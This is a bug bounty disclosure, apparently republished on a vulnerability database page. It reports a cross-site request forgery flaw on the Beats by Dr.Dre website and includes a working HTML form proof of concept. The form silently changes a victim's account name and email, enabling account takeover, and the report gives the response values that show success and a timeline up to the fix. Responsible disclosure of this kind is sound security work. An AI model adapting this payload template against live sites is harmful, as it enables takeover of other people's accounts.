`Hello,
I am Aaditya Purani, and i had found an CSRF (Cross Site Request Forgery )
on Beats by Dr.Dre which could lead to full Account Takeover and
Information change by Just sending a Malicious crafted Link to the user.
Proof of Concept:
<html>
<!-- CSRF PoC - By Aaditya Purani -->
<body>
<form method='POST' action="
https://www.beatsbydre.com/on/demandware.store/Sites-beats-Site/en_US/GigyaRAAS-SaveCustomer
">
<input type="hidden" name="firstName" value="hacked" />
<input type="hidden" name="lastName" value="hackerone" />
<input type="hidden" name="emailAddress" value="[email protected]" /> <
input type="hidden" name="zip" value="" />
<input type="hidden" name="phone" value="" />
<input type="hidden" name="csrf_token" value="
VxM7k0ya2N1R69Ix9E3m/2165n60n2p399n38q6r1904o1po98r1snn323q0q/3Ex5Klu9mD1x5vMo91
" />
<input type="hidden" name="isEmailSubscription" value="true" />
<input type="hidden" name="isAlreadySubscribed" value="false" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Response :
{aisCustomerSavedSuccessfullya: true, aunsubscribeStatusa: null } -> Attack
Successful
{aisCustomerSavedSuccessfullya: false, aunsubscribeStatusa: null } ->
Attack Unsuccessful
Clicking on this Link, would change details of any User. I have wrote an
Complete Blog here:
https://aadityapurani.com/2016/07/20/how-i-hacked-your-beats-account-apple-bug-bounty/
Video PoC: https://youtu.be/2SfmmWxiDck
Apple has Acknowledged me in their Hall of fame:
https://support.apple.com/en-us/HT201536
*Timeline:*
October 8th 2015 a Reported
October 23th 2015 a Triaged
November 6th 2015 a Responded that aMatter is being investigateda
January 18th 2016 a Fixed
June 20th 2016 a Acknowledged
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation